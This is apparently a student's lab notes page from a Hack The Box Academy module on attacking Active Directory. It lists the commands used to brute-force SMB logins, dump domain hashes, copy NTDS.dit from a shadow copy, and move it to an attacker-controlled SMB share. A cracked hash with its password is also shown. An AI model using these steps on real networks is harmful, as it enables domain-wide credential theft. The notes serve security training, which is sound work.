Attacking Active Directory & NTDS.dit

June 06, 2024

I just used the msfconsole because using crackmapexec is taking way too long bruteforcing smb

msfconsole -q 
search smb_login
use 0
options
set rhost 
set user_file /home/kyou/academy-htb/password-attakcs/attacking-ntds/john.txt
set pass_file /usr/share/wordlists/fasttrack.txt
run

poetry run crackmapexec smb 10.129.95.160 -u jmarston -p P@ssword! --ntds

92fd67fd2f49d0e83744aa82363f021b:Winter2008

THE OTHER WAY TO GET THE NTDS.dit

./evil-winrm.rb -i 10.129.202.85 -u jmarston -p 'P@ssword!'

First we have to look for the current local group membership that our user have

net localgroup

Then check for the privilege of our user including domain

net user jmarston

Creating a drive where the AD is initially installed using vssadmin

vssadmin CREATE SHADOW /For=C:

Now we are going to use cmd to copy the ntds.dit from shadow copy

First we have to make a directory named NTDS

cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

In our attacker machine we have to create a smb server that will receive the ntds file

mkdir NTDS
sudo impacket-smbserver -smb2support NTDSFileShare NTDS

Now just move the ntds file from windows to our attacker machine

cmd.exe /c move C:\NTDS\NTDS.dit \\10.10.15.173\NTDSFileShare

Now we can view the NTDS.dit file in our attacker machine

cd NTDS 
ls

PreviousAttacking LSASS NextCredential Hunting in Windows

Last updated 1 year ago